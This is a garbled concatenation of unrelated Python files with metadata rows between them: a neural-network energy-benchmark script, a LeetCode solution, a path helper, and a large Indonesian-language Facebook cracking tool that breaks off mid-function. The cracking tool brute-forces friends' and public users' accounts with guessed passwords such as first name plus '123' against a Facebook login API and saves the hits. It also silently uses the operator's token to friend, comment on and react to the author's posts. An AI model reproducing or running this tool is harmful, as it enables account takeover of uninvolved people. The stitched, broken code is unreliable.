sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
def get_common_divisor(self,a,b):
'''
获得两个数的所有公约数
'''
common_divisor_list = [1]
for i in range(2,max(a,b)):
if(a%i == 0 and b%i == 0):
common_divisor_list.append(i)
return common_divisor_list
def get_link_vector(self,link_list,target_layer_index):
'''
生成一个节点的连接向量
target_layer_index表示该节点在layer_id中的数组下标
'''
link_vector = [0 for i in range(target_layer_index+1)]
for i in range(0,len(link_list)):
if(link_list[i] == -1):
#表示接收初始输入
link_vector[target_layer_index] = 1
else:
link_vector[link_list[i]] = 1
return link_vector
def get_params_length(self,layer_id):
'''
获取不同层参数向量长度
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
def get_params_num(self,layer_id,params_list):
'''
计算一个层的参数数量
'''
# print(layer_id,params_list)
if layer_id == 0:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 1:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 2:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 3:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 4:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 5:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 6:
return 0
elif layer_id == 7:
return 0
elif layer_id == 8:
return 0
elif layer_id == 9:
return 0
elif layer_id == 10:
return 0
elif layer_id == 11:
return 0
elif layer_id == 12:
return 0
elif layer_id == 13:
return 0
elif layer_id == 14:
return 0
elif layer_id == 15:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 16:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 17:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 18:
return 0
elif layer_id == 19:
return 0
elif layer_id == 20:
return 0
elif layer_id == 21:
input_length,output_length = params[1,3]
return input_length*(output_length+1)
elif layer_id == 22:
return 0
elif layer_id == 23:
return 0
elif layer_id == 24:
return 0
elif layer_id == 25:
return 0
elif layer_id == 26:
return 0
def prob_random(arr1,arr2):
'''
指定概率,获取随机数
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
def make_net_data(a):
while(1):
stream_num = 1
if random.randint(0,100)<23:
block_num = random.randint(4,7)
else:
block_num = random.randint(8,18)
large = 1
# large = random.randint(0,1)
try:
dim = 2
print(stream_num,block_num,large)
vg = VectorGenerator(dimension=dim,block_num=block_num,stream_num=stream_num,large = large)
vg.make_net()
if not validate_NN(vg,dim):
stream_num = 1
if random.randint(0,100)<23:
block_num = random.randint(4,7)
else:
block_num = random.randint(8,18)
# large = random.randint(0,1)
continue
except:
continue
else:
break
def get_energy(return_dict,iLocIndexer,net_input):
try:
monitor = Monitor(0.01)
layer_parameters = iLocIndexer['layer_parameters'].split(',')
layer_parameters = [float(x) if '.' in x else int(x) for x in layer_parameters]
layer_link = iLocIndexer['layer_link'].split(',')
layer_link = [int(x) for x in layer_link]
layer_id = iLocIndexer['layer_id'].split(',')
layer_id = [int(x) for x in layer_id]
NN = NNgenerator(layer_parameters,layer_link,layer_id)
NN.cuda()
dim = int(iLocIndexer['dimension'])
if dim == 1:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]))
elif dim ==2:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]),int(net_input[3]))
elif dim ==3:
x = torch.rand(int(net_input[0]),int(net_input[1]),int(net_input[2]),int(net_input[3]),int(net_input[4]))
b_x = Variable(x).cuda()
torch.cuda.synchronize()
start_time = round(time.time()*1000)
monitor.begin()
for i in range(0,10000):
print(i)
output = NN(b_x)
if round(time.time()*1000) - start_time > 15 * 1000 and i >= 5:
forward_num = i
print('结束')
break
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
forward_energy = (monitor.forward_energy) / forward_num # mJ
silence_energy = (monitor.silence) / forward_num # mJ
all_energy = (monitor.all_energy) / forward_num # mJ
mean_power = monitor.mean_power
all_time = monitor.all_time
monitor.exit()
except Exception as e:
print(traceback.print_exc())
print(repr(e))
with open(r'energy_%s.txt' % file_name,"a") as file: #只需要将之前的”w"改为“a"即可,代表追加内容
file.write("0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + "\n")
file.close()
else:
save_energy(iLocIndexer,forward_energy,silence_energy,all_energy,mean_power,forward_num,all_time)
def save_energy(iLocIndexer,forward_energy,silence_energy,all_energy,mean_power,forward_num,all_time):
str1 = ''
str1 += iLocIndexer['layer_parameters'] + " "
str1 += iLocIndexer['layer_link'] + " "
str1 += iLocIndexer['layer_id'] + " "
str1 += str(iLocIndexer['params_num']) + " "
str1 += str(iLocIndexer['dimension']) + " "
str1 += str(iLocIndexer['block_num']) + " "
str1 += str(iLocIndexer['stream_num']) + " "
str1 += cpu_name + " "
str1 += cpu_MHz + " "
str1 += cache_size + " "
str1 += str(processor_num) + " "
str1 += gpu_name + " "
str1 += str(mean_power) + " "
str1 += str(all_time) + " "
str1 += str(forward_num) + " "
str1 += str(forward_energy) + " "
str1 += str(silence_energy) + " "
str1 += str(all_energy)
# print(str1)
with open(r'energy_%s.txt' % file_name,"a") as file: #只需要将之前的”w"改为“a"即可,代表追加内容
file.write(str1 + "\n")
file.close()
import gc
import sys
if __name__ == '__main__':
for i in range(0,100000):
num_processes = 1
p = mp.Process(target=make_net_data, args=(1,))
p.start()
p.join()
# sys.exit(1)
| 42.515815 | 287 | 0.613377 | 16,206 | 122,318 | 4.317845 | 0.037332 | 0.049904 | 0.027953 | 0.019879 | 0.860522 | 0.836985 | 0.804659 | 0.79164 | 0.777835 | 0.765188 | 0 | 0.041373 | 0.280727 | 122,318 | 2,876 | 288 | 42.530598 | 0.753978 | 0.11811 | 0 | 0.699456 | 0 | 0 | 0.005877 | 0 | 0 | 0 | 0 | 0 | 0.010381 | 1 | 0.017301 | false | 0 | 0.012358 | 0 | 0.091943 | 0.004943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4308b7e60bc1b6e948ac4b2df528bfc55040f7e7 | 1,652 | py | Python | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null | 165-compare-version-numbers.py | daicang/Leetcode | 676b05c1222670f73294eb2ed2665433eac148f4 | [
"MIT"
] | null | null | null |
class Solution:
def compareVersion(self, version1: str, version2: str) -> int:
v1 = version1.split('.')
v2 = version2.split('.')
for i, val in enumerate(v1):
start = 0
while start < len(val)-1 and val[start] == '0':
start += 1
v1[i] = val[start:]
for i, val in enumerate(v2):
start = 0
while start < len(val)-1 and val[start] == '0':
start += 1
v2[i] = val[start:]
if len(v1) > len(v2):
v2.extend(['0']*(len(v1)-len(v2)))
elif len(v2) > len(v1):
v1.extend(['0']*(len(v2)-len(v1)))
val1 = int(''.join(v1))
val2 = int(''.join(v2))
if val1 > val2:
return 1
if val1 == val2:
return 0
return -1
s = Solution()
data = [
['0.1', '0.1.0.0'],
['1.0.1', '1'],
['7.5.2.4', '7.3'],
['1.1', '1.01'],
["19.8.3.17.5.01.0.0.4.0.0.0.0.0.0.0.0.0.0.0.0.0.00.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000",
"19.8.3.17.5.01.0.0.4.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0000.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.000000"]
]
for d in data:
print(s.compareVersion(*d))
| 36.711111 | 323 | 0.458838 | 441 | 1,652 | 1.718821 | 0.104308 | 0.736148 | 1.072559 | 1.403694 | 0.581794 | 0.534301 | 0.534301 | 0.534301 | 0.534301 | 0.534301 | 0 | 0.310317 | 0.237288 | 1,652 | 44 | 324 | 37.545455 | 0.29127 | 0 | 0 | 0.166667 | 0 | 0.055556 | 0.406061 | 0.382424 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0 | 0 | 0.138889 | 0.027778 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
433bbf04ce5cc007c8e4ff964cfeb8b75124a4a1 | 65 | py | Python | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | 1 | 2021-07-23T03:43:19.000Z | 2021-07-23T03:43:19.000Z | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | null | null | null | app/__root__.py | Peopple-Shopping-App/mockserver | c38c3f325e44f4eaba39cdbe24544e3181307218 | [
"MIT"
] | null | null | null | import os
def __path__():
return os.path.dirname(__file__)
| 10.833333 | 36 | 0.707692 | 9 | 65 | 4.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 5 | 37 | 13 | 0.716981 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
4a29aa55d71f55ae3c0de192137f80d2682f80f4 | 57,554 | py | Python | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | testvip.py | badwordking/Lonte | 6fe2f3f8105c46c5bf494cfd73e35086ea4df874 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #!/usr/bin/python2
# coding=utf-8
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 vip.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user.lower()-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """\033[1;90m╔══════════════════════════════════════════╗
\033[1;90m║\033[1;93m █████████ \033[1;91m ████████ INDONESIA \033[1;90m ║
\033[1;90m║\033[1;93m █▄█████▄█ \033[1;97m████████ 2020-2021 \033[1;90m ║
\033[1;90m║\033[1;93m █\033[1;91m▼▼▼▼▼▼▼\033[1;93m█ \033[1;90m ║
\033[1;90m║\033[1;93m██ \033[1;97mHELLO \033[1;93m██ \033[1;92m☠\033[1;95m AU \033[1;93m: \033[1;96mMuhammad Rizky \033[1;90m ║
\033[1;90m║\033[1;93m █\033[1;91m▼▼▼▼▼▼▼\033[1;93m█ \033[1;92m☠\033[1;95m GH \033[1;93m: \033[1;96mGithub.com/RIZKY4/vip \033[1;90m║
\033[1;90m║\033[1;96m █████████ \033[1;92m☠\033[1;95m FB \033[1;93m: \033[1;96mfb.com/Rizky.Rasata \033[1;90m ║
\033[1;90m║\033[1;92m ██ ██ \033[1;90m ║
\033[1;90m╚══════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
gagal = []
reaksi = []
komen = []
vulnot = "Not Vuln"
vuln = "Vuln"
######MASUK######
def masuk():
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;93m Login via email/id fb"
print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;93m Login via token fb "
print "\033[1;97m[\033[1;92m03\033[1;97m]\033[1;96m->\033[1;93m Ambil Token"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;93m Keluar"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
login()
elif msuk =="2" or msuk =="02":
tokenz()
elif msuk =="3"or msuk =="03":
Ambil_Token()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
#####LOGIN_EMAIL#####
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print "\033[1;97m[\033[1;96m×\033[1;97m] LOGIN AKUN FACEBOOK ANDA \033[1;97m[\033[1;96m×\033[1;97m]"
id = raw_input('[\033[1;95m+\033[1;97m] ID/Email =\033[1;92m ')
pwd = raw_input('\033[1;97m[\033[1;95m?\033[1;97m] Password =\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n[!] Tidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except requests.exceptions.ConnectionError:
print"\n[!] Tidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[\033[1;93m!\033[1;97m]\033[1;93m Sepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97m[\033[1;91m!\033[1;97m]\033[1;91m Password/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m[\033[1;95m?\033[1;97m] \033[1;93mToken : \033[1;92m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
print '\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except KeyError:
print "\033[1;97m[\033[1;91m!\033[1;97m] \033[1;91mToken salah !"
time.sleep(1.7)
masuk()
######BOT KOMEN#######
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
una = ('10001n3185071041')
kom = ('Gw Pake Sc Lu Bang 😘')
reac = ('ANGRY')
post = ('9377n77953338365')
post2 = ('938n954086554085')
kom2 = ('Mantap Bang 😁')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
######AMBIL_TOKEN######
def Ambil_Token():
os.system("clear")
print logo
jalan("\033[1;92mInstall...")
os.system ("cd ... && npm install")
jalan ("\033[1;96mMulai...")
os.system ("cd ... && npm start")
raw_input("\n[ Kembali ]")
masuk()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m✓\033[1;97m]\033[1;93m NAMA\033[1;91m =>\033[1;92m "+nama
print "\033[1;97m[\033[1;92m•\033[1;97m]\033[1;93m ID\033[1;91m =>\033[1;92m "+id
print "\033[1;97m[\033[1;92m+\033[1;97m]\033[1;93m TTL\033[1;91m =>\033[1;92m "+ a['birthday']
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;97m Crack Id Indonesia"
print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;97m Crack Id Bangladesh/Pakistan"
print "\033[1;97m[\033[1;92m03\033[1;97m]\033[1;96m->\033[1;97m Crack Id Semua Negara (Buat Sandi)"
print "\033[1;97m[\033[1;92m04\033[1;97m]\033[1;96m->\033[1;97m Ambil Id"
print "\033[1;97m[\033[1;92m05\033[1;97m]\033[1;96m->\033[1;97m Yahoo Clone"
print "\033[1;97m[\033[1;92m06\033[1;97m]\033[1;96m->\033[1;97m Profile Guard"
print "\033[1;97m[\033[1;92m07\033[1;97m]\033[1;96m->\033[1;97m Ikuti Saya Di Facebook"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Logout"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih()
######PILIH######
def pilih():
unikers = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if unikers =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
elif unikers =="1" or unikers =="01":
indo()
elif unikers =="2" or unikers =="02":
bangla()
elif unikers =="3" or unikers =="03":
sandi()
elif unikers =="4" or unikers =="04":
dump()
elif unikers =="5" or unikers =="05":
menu_yahoo()
elif unikers =="6" or unikers =="06":
guard()
elif unikers =="7" or unikers =="07":
saya()
elif unikers =="0" or unikers =="00":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
########## CRACK INDONESIA #######
def indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;93m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;93m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;93m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_indo()
#### PILIH INDO ####
def pilih_indo():
teak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print " \033[1;93m ××× \033[1;97mCRACK INDONESIA \033[1;93m×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m{\033[1;93m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;93m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n[ Kembali ]")
indo()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;93m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[!] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
indo()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m{\033[1;93m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;93m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;93m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
##### MAIN INDONESIA #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user.lower()+'/?access_token='+toket)
c = json.loads(a.text)
pass1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower().lower())+"&locale=en_US&password="+(pass1.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass1
oks.append(user.lower().lower()+pass1.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass1
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass1.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass1.lower())
else:
pass2 = c['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass2.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass2.lower()
oks.append(user.lower()+pass2.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass2.lower()
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass2.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass2.lower())
else:
pass3 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass3.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass3.lower()
oks.append(user.lower()+pass3.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass3.lower()
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass3.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass3.lower())
else:
pass4 = 'Sayang'
